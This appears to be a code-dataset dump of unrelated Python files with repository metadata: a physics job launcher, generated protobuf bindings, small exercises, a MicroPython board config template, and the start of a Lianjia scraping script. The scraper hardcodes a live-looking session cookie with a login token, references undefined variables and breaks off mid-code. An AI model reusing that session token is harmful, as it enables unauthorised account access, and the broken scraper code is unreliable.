e9646a505a34ad7b3d5267374dee42582cbb4105 | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/1783.py | 846a90ebdfa5cca0aac4e9db0be2a33b1dc410f9 | []
| no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 786 | py | ii = [('CookGHP3.py', 21), ('SadlMLP.py', 1), ('WilbRLW.py', 29), ('RennJIT.py', 1), ('ProuWCM.py', 2), ('AubePRP2.py', 7), ('UnitAI.py', 1), ('WilbRLW5.py', 1), ('MarrFDI3.py', 1), ('PeckJNG.py', 2), ('AubePRP.py', 35), ('FitzRNS3.py', 2), ('WilbRLW2.py', 2), ('ClarGE2.py', 74), ('CarlTFR.py', 5), ('AdamHMM.py', 1), ('RoscTTI2.py', 1), ('CrokTPS.py', 5), ('ClarGE.py', 30), ('LyelCPG.py', 55), ('DaltJMA.py', 1), ('WestJIT2.py', 1), ('WadeJEB.py', 7), ('WheeJPT.py', 2), ('MereHHB3.py', 6), ('HogaGMM.py', 3), ('MartHRW.py', 1), ('WestJIT.py', 6), ('CoolWHM3.py', 2), ('FitzRNS.py', 1), ('StorJCC.py', 9), ('WilbRLW3.py', 2), ('ClarGE3.py', 36), ('FitzRNS2.py', 2), ('HogaGMM2.py', 3), ('EvarJSP.py', 19), ('DwigTHH.py', 4), ('SadlMLP2.py', 5), ('LyelCPG3.py', 4), ('DibdTBR.py', 1)] | [
"[email protected]"
]
| |
3b0bb11732c17bc4fc7df9419413a488fbd43761 | 149364d3e923ac89990be782a4a8464f4f7f0377 | /number_reader.py | ef7c215a47a06c4bd943587aa979b95b81be8457 | []
| no_license | laboyd001/python-crash-course-ch10 | dec44a1a81dc20931f4cc22e6ab6da0d6716895a | b42aadc9aafc422ffd1e99035c8519cae02ebdba | refs/heads/master | 2020-04-13T20:25:42.502954 | 2018-12-28T16:27:37 | 2018-12-28T16:27:37 | 163,429,396 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | #reads the list back from the json file
import json
filename = 'numbers.json'
with open(filename) as f_obj:
numbers = json.load(f_obj)
print(numbers) | [
"[email protected]"
]
| |
99a5ccdf1262a853052de6a1007107d9fb70371e | 3e4c9f69ea13636e2bf8766b3736af373a3c83f6 | /MonoHbb/RunAllRegionUsingFarmOut_wj.py | cf5d8db29d725dda489f493b8ab9557fbeeca3d8 | []
| no_license | ramankhurana/MonoH | c32f44fddb65677d31846ec6aa9c6c0ac0b5877b | 8495336ba22a81858fcaf23a7f4ebd7fc6880985 | refs/heads/master | 2020-04-18T14:41:40.393519 | 2017-08-10T11:16:53 | 2017-08-10T11:16:53 | 67,509,749 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,257 | py | #!/usr/bin/env python
#from MonoHBranchReader import AnalyzeDataSet, CheckFilter, MakeTable, DeltaR, Phi_mpi_pi
import os
mode='wj'
#inputfilename='NCUGlobalTuples_1.root'
#inputfilename='input.txt'
#outfilename='out.root'
inputfilename = os.environ['INPUT']
outfilename = os.environ['OUTPUT']
if mode == 'signal':
os.system('./MonoHBranchReader.py -m 100.0 -M 150.0 -i '+inputfilename+' -o '+outfilename+' -a -j 0 -J 2 -l 0 -L 1 --MLow1 100.0 --MHigh1 150.0 -F ')
if mode == 'signalpSB':
os.system('./MonoHBranchReader.py -m 30.0 -M 250.0 -i '+inputfilename+' -o '+outfilename+' -a -j 0 -J 2 -l 0 -L 1 --MLow1 30.0 --MHigh1 250.0 -F ')
## Mass Sidebands
## inverting the mass cut
if mode == 'zj':
os.system('./MonoHBranchReader.py -m 30.0 -M 100.0 -i '+inputfilename+' -o '+outfilename+' -a -j 0 -J 2 -l 0 -L 1 --MLow1 150.0 --MHigh1 250.0 -F')
##WJets
## 1 additional lepton
## remove the mass cut
if mode == 'wj':
os.system('./MonoHBranchReader.py -m 30.0 -M 250.0 -i '+inputfilename+' -o '+outfilename+' -a -j 1 -J 2 -l 1 -L 2 --MLow1 30.0 --MHigh1 250.0 -F')
##TT
## 1 additional lepton
## >1 additional jets
if mode == 'tt':
os.system('./MonoHBranchReader.py -m 30.0 -M 250.0 -i '+inputfilename+' -o '+outfilename+' -a -j 2 -J 10 -l 1 -L 2 --MLow1 30.0 --MHigh1 250.0 -F')
## TT+WJ
if mode == 'wt':
os.system('./MonoHBranchReader.py -m 30.0 -M 250.0 -i '+inputfilename+' -o '+outfilename+' -a -j 0 -J 10 -l 1 -L 2 --MLow1 30.0 --MHigh1 250.0 -F')
## WJAlphaBet
if mode == 'wjalphabet':
os.system('./MonoHBranchReader.py -m 30.0 -M 100.0 -i '+inputfilename+' -o '+outfilename+' -a -j 1 -J 2 -l 1 -L 2 --MLow1 150.0 --MHigh1 250.0 -F')
## TTAlphabet
if mode == 'ttalphabet':
os.system('./MonoHBranchReader.py -m 30.0 -M 100.0 -i '+inputfilename+' -o '+outfilename+' -a -j 2 -J 10 -l 1 -L 2 --MLow1 150.0 --MHigh1 250.0 -F')
##WTAlphabet
if mode == 'wtalphabet':
os.system('./MonoHBranchReader.py -m 30.0 -M 100.0 -i '+inputfilename+' -o '+outfilename+' -a -j 0 -J 10 -l 1 -L 2 --MLow1 150.0 --MHigh1 250.0 -F')
| [
"[email protected]"
]
| |
c7b276ea5e16b96df513e71b6809af73b654a3e7 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_indigent.py | f6376ec43de6ef0c5d00c850cc39f702bc8227fb | [
"MIT"
]
| permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 371 | py |
#class header
class _INDIGENT():
def __init__(self,):
self.name = "INDIGENT"
self.definitions = [u'very poor']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
| [
"[email protected]"
]
| |
a22f158e863b765ff5f010bb84b3bd9dd32b735d | 45c142c3e3dc8d3211a86c77385ecfdd10d28fb9 | /dstore/engine/procedures/mi_GetSettings_Ad_pb2.py | 1ec146af358a250e0ba95076adbffc3c35b2dc2a | []
| no_license | dstore-io/dstore-sdk-python | 945d64995c8892af18fab26c90117245abec64a4 | 8494d12ac77c3c3cc6dd59026407ef514ad179fc | refs/heads/master | 2020-06-14T13:07:08.181547 | 2017-01-26T11:19:39 | 2017-01-26T11:19:39 | 75,177,794 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | true | 11,246 | py | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: dstore/engine/procedures/mi_GetSettings_Ad.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from dstore import values_pb2 as dstore_dot_values__pb2
from dstore.engine import engine_pb2 as dstore_dot_engine_dot_engine__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='dstore/engine/procedures/mi_GetSettings_Ad.proto',
package='dstore.engine.mi_GetSettings_Ad',
syntax='proto3',
serialized_pb=_b('\n0dstore/engine/procedures/mi_GetSettings_Ad.proto\x12\x1f\x64store.engine.mi_GetSettings_Ad\x1a\x13\x64store/values.proto\x1a\x1a\x64store/engine/engine.proto\"\x98\x02\n\nParameters\x12,\n\x07user_id\x18\x01 \x01(\x0b\x32\x1b.dstore.values.IntegerValue\x12\x15\n\x0cuser_id_null\x18\xe9\x07 \x01(\x08\x12\x30\n\x0ckey_variable\x18\x02 \x01(\x0b\x32\x1a.dstore.values.StringValue\x12\x1a\n\x11key_variable_null\x18\xea\x07 \x01(\x08\x12\x46\n!search_for_key_variable_with_like\x18\x03 \x01(\x0b\x32\x1b.dstore.values.BooleanValue\x12/\n&search_for_key_variable_with_like_null\x18\xeb\x07 \x01(\x08\"\x80\x03\n\x08Response\x12\x38\n\x10meta_information\x18\x02 \x03(\x0b\x32\x1e.dstore.engine.MetaInformation\x12\'\n\x07message\x18\x03 \x03(\x0b\x32\x16.dstore.engine.Message\x12:\n\x03row\x18\x04 \x03(\x0b\x32-.dstore.engine.mi_GetSettings_Ad.Response.Row\x1a\xd4\x01\n\x03Row\x12\x0f\n\x06row_id\x18\x90N \x01(\x05\x12.\n\tuser_name\x18\x91N \x01(\x0b\x32\x1a.dstore.values.StringValue\x12-\n\x07user_id\x18\x92N \x01(\x0b\x32\x1b.dstore.values.IntegerValue\x12*\n\x05value\x18\x93N \x01(\x0b\x32\x1a.dstore.values.StringValue\x12\x31\n\x0ckey_variable\x18\x94N \x01(\x0b\x32\x1a.dstore.values.StringValueBR\n\x1bio.dstore.engine.proceduresZ3gosdk.dstore.de/engine/procedures/mi_GetSettings_Adb\x06proto3')
,
dependencies=[dstore_dot_values__pb2.DESCRIPTOR,dstore_dot_engine_dot_engine__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_PARAMETERS = _descriptor.Descriptor(
name='Parameters',
full_name='dstore.engine.mi_GetSettings_Ad.Parameters',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='user_id', full_name='dstore.engine.mi_GetSettings_Ad.Parameters.user_id', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='user_id_null', full_name='dstore.engine.mi_GetSettings_Ad.Parameters.user_id_null', index=1,
number=1001, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='key_variable', full_name='dstore.engine.mi_GetSettings_Ad.Parameters.key_variable', index=2,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='key_variable_null', full_name='dstore.engine.mi_GetSettings_Ad.Parameters.key_variable_null', index=3,
number=1002, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='search_for_key_variable_with_like', full_name='dstore.engine.mi_GetSettings_Ad.Parameters.search_for_key_variable_with_like', index=4,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='search_for_key_variable_with_like_null', full_name='dstore.engine.mi_GetSettings_Ad.Parameters.search_for_key_variable_with_like_null', index=5,
number=1003, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=135,
serialized_end=415,
)
_RESPONSE_ROW = _descriptor.Descriptor(
name='Row',
full_name='dstore.engine.mi_GetSettings_Ad.Response.Row',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='row_id', full_name='dstore.engine.mi_GetSettings_Ad.Response.Row.row_id', index=0,
number=10000, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='user_name', full_name='dstore.engine.mi_GetSettings_Ad.Response.Row.user_name', index=1,
number=10001, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='user_id', full_name='dstore.engine.mi_GetSettings_Ad.Response.Row.user_id', index=2,
number=10002, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='dstore.engine.mi_GetSettings_Ad.Response.Row.value', index=3,
number=10003, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='key_variable', full_name='dstore.engine.mi_GetSettings_Ad.Response.Row.key_variable', index=4,
number=10004, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=590,
serialized_end=802,
)
_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='dstore.engine.mi_GetSettings_Ad.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='meta_information', full_name='dstore.engine.mi_GetSettings_Ad.Response.meta_information', index=0,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='message', full_name='dstore.engine.mi_GetSettings_Ad.Response.message', index=1,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='row', full_name='dstore.engine.mi_GetSettings_Ad.Response.row', index=2,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_RESPONSE_ROW, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=418,
serialized_end=802,
)
_PARAMETERS.fields_by_name['user_id'].message_type = dstore_dot_values__pb2._INTEGERVALUE
_PARAMETERS.fields_by_name['key_variable'].message_type = dstore_dot_values__pb2._STRINGVALUE
_PARAMETERS.fields_by_name['search_for_key_variable_with_like'].message_type = dstore_dot_values__pb2._BOOLEANVALUE
_RESPONSE_ROW.fields_by_name['user_name'].message_type = dstore_dot_values__pb2._STRINGVALUE
_RESPONSE_ROW.fields_by_name['user_id'].message_type = dstore_dot_values__pb2._INTEGERVALUE
_RESPONSE_ROW.fields_by_name['value'].message_type = dstore_dot_values__pb2._STRINGVALUE
_RESPONSE_ROW.fields_by_name['key_variable'].message_type = dstore_dot_values__pb2._STRINGVALUE
_RESPONSE_ROW.containing_type = _RESPONSE
_RESPONSE.fields_by_name['meta_information'].message_type = dstore_dot_engine_dot_engine__pb2._METAINFORMATION
_RESPONSE.fields_by_name['message'].message_type = dstore_dot_engine_dot_engine__pb2._MESSAGE
_RESPONSE.fields_by_name['row'].message_type = _RESPONSE_ROW
DESCRIPTOR.message_types_by_name['Parameters'] = _PARAMETERS
DESCRIPTOR.message_types_by_name['Response'] = _RESPONSE
Parameters = _reflection.GeneratedProtocolMessageType('Parameters', (_message.Message,), dict(
DESCRIPTOR = _PARAMETERS,
__module__ = 'dstore.engine.procedures.mi_GetSettings_Ad_pb2'
# @@protoc_insertion_point(class_scope:dstore.engine.mi_GetSettings_Ad.Parameters)
))
_sym_db.RegisterMessage(Parameters)
Response = _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), dict(
Row = _reflection.GeneratedProtocolMessageType('Row', (_message.Message,), dict(
DESCRIPTOR = _RESPONSE_ROW,
__module__ = 'dstore.engine.procedures.mi_GetSettings_Ad_pb2'
# @@protoc_insertion_point(class_scope:dstore.engine.mi_GetSettings_Ad.Response.Row)
))
,
DESCRIPTOR = _RESPONSE,
__module__ = 'dstore.engine.procedures.mi_GetSettings_Ad_pb2'
# @@protoc_insertion_point(class_scope:dstore.engine.mi_GetSettings_Ad.Response)
))
_sym_db.RegisterMessage(Response)
_sym_db.RegisterMessage(Response.Row)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\033io.dstore.engine.proceduresZ3gosdk.dstore.de/engine/procedures/mi_GetSettings_Ad'))
import grpc
from grpc.beta import implementations as beta_implementations
from grpc.beta import interfaces as beta_interfaces
from grpc.framework.common import cardinality
from grpc.framework.interfaces.face import utilities as face_utilities
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
]
| |
85f61554cf66fecc3b5b8039b168fd7dffb6a7ef | 38e82df34efcb0ed819f49457210be9616caf875 | /ABC/001/1_b.py | 6bdba55ebd8cc3127a1ca59bbcc6bb1fe74238b8 | []
| no_license | oden6680/AtCoder | 96385ce02ff02909e2f17123dad67d63baa4a0f7 | 3b20885d86726fcf4617076d653abb125609125e | refs/heads/master | 2022-09-19T13:12:02.705304 | 2020-05-31T19:58:51 | 2020-05-31T19:58:51 | 263,191,816 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | N = int(input())
N = N/1000
if N < 0.1:
vv = 0
elif 0.1 <= N <= 5:
vv = 10 * N
elif 6 <= N <= 30:
vv = N + 50
elif 35 <= N <= 70:
vv = (N-30)/5 + 80
elif N > 70:
vv = 89
print(str(int(vv)).zfill(2)) | [
"[email protected]"
]
| |
42520a99c2baa0939e5f98eaaa0557f0cd41267d | 4bc19f4dd098ebedcb6ee78af0ae12cb633671fe | /chat_tornadio/utils.py | 4b8d14624b491fecf606f0044b54b05fb6f57ba5 | []
| no_license | StanislavKraev/rekvizitka | 958ab0e002335613a724fb14a8e4123f49954446 | ac1f30e7bb2e987b3b0bda4c2a8feda4d3f5497f | refs/heads/master | 2021-01-01T05:44:56.372748 | 2016-04-27T19:20:26 | 2016-04-27T19:20:26 | 57,240,406 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 199 | py | # -*- coding: utf-8 -*-
import time
def get_cts():
return int(round(time.time() * 100000))
def cts_from_timedelta(td):
ts = td.seconds + td.days * 24 * 3600
return ts * 100000
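# Illustrative note: one tick here is 10 microseconds, so
# cts_from_timedelta(datetime.timedelta(seconds=1)) == 100000.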
| [
"[email protected]"
]
| |
99d9e5dbdc792339e2c8bba2b457342b933a13d6 | f0a5ad7b8aa39f51f233391fead0da3eabecc4ee | /.history/move_20191127160834.py | d778b2ac46a5923d344172f9540fa2d93731f29a | []
| no_license | OseiasBeu/webScrapping | e0a524847e55b24dbbd3d57bbe7fa43b4e101f48 | 1e72c7551aea355a891043baecfcbab8a89e719a | refs/heads/master | 2022-10-25T18:12:50.858653 | 2020-06-18T01:29:24 | 2020-06-18T01:29:24 | 224,681,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | import os, shutil, glob
oldAddress = 'C:/Users/beuo/Downloads/*.xlsx'
newAddress = 'C:/Users/beuo/Documents/Demandas/AtualizaMiddleIntegrationVtex'
# shutil.copy does not expand glob patterns, so copy each matching workbook
for xlsx_file in glob.glob(oldAddress):
    shutil.copy(xlsx_file, newAddress)
# try:
# os.makedirs(dst_fldr)
# except:
# print("erro")
# for xlsx_file in glob.glob(src_fldr+"//*.xlsx"):
# shutil.copy2(src_fldr,dst_fldr)
| [
"[email protected]"
]
| |
2c86b17eb75e0656480c03e3bf0711470a886191 | 6761d430bfa38413985efb319cb02171729f3481 | /indlulamithi/makeorders.py | b447228ba164705bde80fab09cd18d08bb090391 | [
"BSD-3-Clause"
]
| permissive | crawfordsm/indlulamithi | b335b469dabefa8b4e1d6dbaafb18eb99c0ee348 | 3d88278f3e7ca5ac46a6bf987eeb475739bd8f22 | refs/heads/master | 2020-12-24T16:05:54.929254 | 2015-01-27T20:41:26 | 2015-01-27T20:41:26 | 29,680,902 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,815 | py | import sys
import os
import numpy as np
from scipy import ndimage as nd
from astropy.io import fits
from astropy import stats
def minflattenimage(data, size=10):
"""Smooth the image and flatten it using the minimum value in the image
Parameters
----------
data: ndarray
image to flatten
size: int
smoothing size for image
Returns
-------
data: ndarray
        flattened image
"""
# flatten image in y direction
m = np.median(data, axis=1)
m = nd.minimum_filter(m, size=size)
m.shape = (len(m), 1)
data = data / m
# flatten image in x direction
m = np.median(data, axis=0)
m = nd.minimum_filter(m, size=size)
data = data / m
return data
def calc_coef(data, xc, yc):
"""Given a position of an order,
       determine the equation that defines
its position in the image
"""
yc = int(yc)
cutout = data.copy()
obj, sci_num = nd.label(cutout)
cutout[obj != obj[yc, xc]] = 0
y, x = np.where(cutout > 0)
coef = np.polyfit(x, y, 2)
return cutout, coef
def make_orders(data, xc=680, limit=1.5, image_size=10, order_size=2, outfile=None):
"""Determine coefficients that describe all of the orders in the image
Parameters
----------
data: ndarray
image array with orders in the image
xc: int
Column to extract orders from
limit: float
Limit for select orders in flattened data
image_size: int
Size for minimum filtering of images
order_size: int
Size for minimum filtering of orders
Returns
-------
order_dict: dict
Dictionary with the key representing the y-position of the
order at xc and containing a list of coefficients describing
the shape of the order
"""
# flatten the data
data = minflattenimage(data, image_size)
# create a rough image of just the location of the orders
mask = (data < limit)
data[mask] = 0
# clean up the orders and caculate
# starting position for each order
n = nd.minimum_filter(data[:, xc], size=order_size)
o, num = nd.label(n)
pos = nd.center_of_mass(n, o, range(1, num))
pos = np.array(pos)
# determine the shape of the orders
order_dict = {}
for yc in pos:
yc = yc[0]
cutout, coef = calc_coef(data, xc, yc)
order_dict[yc] = coef
if outfile is not None:
keys = sorted(order_dict.keys())
fout = open(outfile, 'w')
for i in keys:
coef = order_dict[i]
output = '%i ' % i
output += ' '.join(['%e' % x for x in coef])
if i > 0:
fout.write(output + '\n')
fout.close()
return order_dict
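# Hypothetical usage sketch -- the FITS file name and keyword values below
# are assumptions for illustration, not part of the original module:
if __name__ == '__main__':
    frame = fits.getdata('echelle_frame.fits')  # 2D image containing orders
    orders = make_orders(frame, xc=680, outfile='orders.txt')
    print('traced %i orders' % len(orders))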
| [
"[email protected]"
]
| |
6fff6f6268ec05e04bfd66704d708b4988f2a055 | b47289da22cab052a5aa86c940ee45073a82edcb | /board/board_config_tmpl.py | 0bc4e4365410ce214346b7805cc4ae67d130f9fa | [
"MIT"
]
| permissive | domenc/mqboard | 3195d4d9342f4a2d805fe17f6e22d240af265a7a | 46ccff99ac60f4f2cb892f41f2b5f8d5a1bc59a9 | refs/heads/master | 2022-11-08T05:33:30.286187 | 2020-07-02T06:25:56 | 2020-07-02T06:25:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,414 | py | # board_config contains magic strings that don't get published or checked into source control
# kind tells us which type of board this is running, it is used in board to define LED pins
kind = "nodemcu" <--- UPDATE
#kind = "huzzah32"
#kind = "lolin-d32"
#kind = "esp32thing"
#kind = "tinypico"
#kind = "ezsbc"
# location is the system name and is used in mqtt topics, etc
location = "mqtest"
wifi_ssid = "MY-SSID" <--- UPDATE
wifi_pass = "MY-PASSWD" <--- UPDATE
# directories to add to the system search path (after ["", "/lib"]), not applied in safe mode
syspath = ["/src"]
#
# Configuration of loaded modules
#
# The dicts below get passed to the start() function of the modules loaded by main.py.
# The name of each dict must match the name of the module.
mqtt = { # refer to mqtt_async for the list of config options
"server" : "192.168.0.14", <--- UPDATE
"ssl_params" : { "server_hostname": "mqtt.example.com" }, <--- UPDATE/REMOVE
"user" : "esp32/mqtest", <--- UPDATE/REMOVE
"password" : "00000000000000000000000000000000", <--- UPDATE/REMOVE
"ssid" : wifi_ssid,
"wifi_pw" : wifi_pass,
}
# little convenience for demo to support with and without mqtt["user"]
mqtt_prefix = mqtt.get("user", "esp32/" + location)
mqrepl = {
"prefix" : mqtt_prefix + "/mqb/", # prefix is before cmd/... or reply/...
}
watchdog = {
"prefix" : mqrepl["prefix"], # must be mqrepl["prefix"]
"timeout" : 120, # watchdog timeout in seconds, default is 300
"allok" : 180, # wait time in secs after connection before giving all-OK (no safe mode)
"revert" : True, # whether to revert from safe mode to normal mode after all-OK time
}
logging = {
"topic" : mqtt_prefix + "/log",
"boot_sz" : 10*1024, # large buffer at boot, got plenty of memory then
"boot_level" : 10, # 10=debug, 20=info, 30=warning (avoiding import logging)
"loop_sz" : 1024, # more moderate buffer once connected
"loop_level" : 10, # 10=debug, 20=info, 30=warning (avoiding import logging)
}
# Modules to load and call start on. For module foo, if this file defines foo then
# foo.start(mqtt, foo) is called, else foo.start(mqtt, {}). If there is no foo.start() then
# that's OK too.
modules = [ "mqtt", "logging", "mqrepl", "watchdog" ]
| [
"[email protected]"
]
| |
aa15b71a1cc27dd14e3c13a3ec4e6b9bd3731eff | 3851a5f2233aa68ae98aa4cd813e0a6dcbda464e | /spider/ljspiderdiy/LianJiaLogIn.py | 81d551a2b649d37d4a2357031d1d77ca537995f2 | []
| no_license | scmsqhn/yunying | 976a2c9fff98613361d4b28719080d9e4d8112dc | 3c30b6985ac974bc75d50e8abe0b69174fb46700 | refs/heads/master | 2021-01-19T21:06:21.778902 | 2017-04-25T09:14:00 | 2017-04-25T09:14:00 | 88,607,812 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,790 | py | # -*- coding: utf-8 -*-
"""
@author: 冰蓝
@site: http://lanbing510.info
"""
import urllib
import urllib2
import json
import cookielib
import re
import zlib
import Cookie  # stdlib Cookie module, used below for SimpleCookie parsing
# Get a CookieJar object (holds this machine's cookie state)
cookie = cookielib.CookieJar()
# Renamed from ``Cookie``: the original shadowed the Cookie module imported
# above, and CookieJar.set_cookie() cannot accept a raw cookie string anyway
raw_cookie_str = 'lianjia_uuid=205d25a0-3fa2-4b8b-89d6-9bc268f11a55; gr_user_id=dba46ec7-3d71-452b-89aa-47e5c3769e45; Hm_lvt_678d9c31c57be1c528ad7f62e5123d56=1487292480; all-lj=007e0800fb44885aa2065c6dfaaa4029; Hm_lvt_efa595b768cc9dc7d7f9823368e795f1=1486726371,1487292481,1488013426; Hm_lpvt_efa595b768cc9dc7d7f9823368e795f1=1488013426; Hm_lvt_660aa6a6cb0f1e8dd21b9a17f866726d=1487987111,1487998799,1487998878,1487998894; Hm_lpvt_660aa6a6cb0f1e8dd21b9a17f866726d=1488024890; _smt_uid=589d8429.404337d7; CNZZDATA1253492306=676618900-1486715611-http%253A%252F%252Fcn.bing.com%252F%7C1488021670; CNZZDATA1254525948=208011574-1486714296-http%253A%252F%252Fcn.bing.com%252F%7C1488021183; CNZZDATA1255633284=1067758961-1486715301-http%253A%252F%252Fcn.bing.com%252F%7C1488022596; CNZZDATA1255604082=435151434-1486716209-http%253A%252F%252Fcn.bing.com%252F%7C1488019770; _ga=GA1.2.1413369539.1486717997; gr_session_id_a1a50f141657a94e=cd746b33-1513-4ff3-9cc7-55877f30753d; select_city=110000; lianjia_token=2.0058b830d0224728c4491519e1353a413d; lianjia_ssid=7235edd6-6171-e796-d406-78b18c3df6fc'
# Build a custom opener and bind it to the CookieJar object
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))
# Install the opener; all later urlopen() calls will go through it
urllib2.install_opener(opener)
def build_opener_with_cookie_str(cookie_str, domain, path='/'):
simple_cookie = Cookie.SimpleCookie(cookie_str) # Parse Cookie from str
cookiejar = cookielib.CookieJar() # No cookies stored yet
for c in simple_cookie:
cookie_item = cookielib.Cookie(
version=0, name=c, value=str(simple_cookie[c].value),
port=None, port_specified=None,
domain=domain, domain_specified=None, domain_initial_dot=None,
path=path, path_specified=None,
secure=None,
expires=None,
discard=None,
comment=None,
comment_url=None,
rest=None,
rfc2109=False,
)
cookiejar.set_cookie(cookie_item) # Apply each cookie_item to cookiejar
return urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar)) # Return opener
# NOTE: the original referenced the undefined names ``ck`` and ``authurl``;
# reuse the raw cookie string captured above with the lianjia cookie
# domain (an assumption) instead
cookie_str = raw_cookie_str
opener = build_opener_with_cookie_str(cookie_str, domain='.lianjia.com')
home_url = 'http://cd.lianjia.com/'
#auth_url = 'https://passport.lianjia.com/cas/login?service=http%3A%2F%2Fcd.lianjia.com%2F'
auth_url = 'https://m.lianjia.com/my/login?redirect=/my/index'
#auth_url = 'https://passport.lianjia.com/cas/login?service=http%3A%2F%2Fcd.lianjia.com%2F&renew=1'
#auth_url = 'https://passport.lianjia.com/cas/login?service=http://cd.lianjia.com/&renew=1'
chengjiao_url = 'http://cd.lianjia.com/chengjiao/'
'''
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'zh-CN,zh;q=0.8',
'Cache-Control': 'no-cache',
'Connection': 'keep-alive',
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'passport.lianjia.com',
'Pragma': 'no-cache',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'
}
'''
headers = {
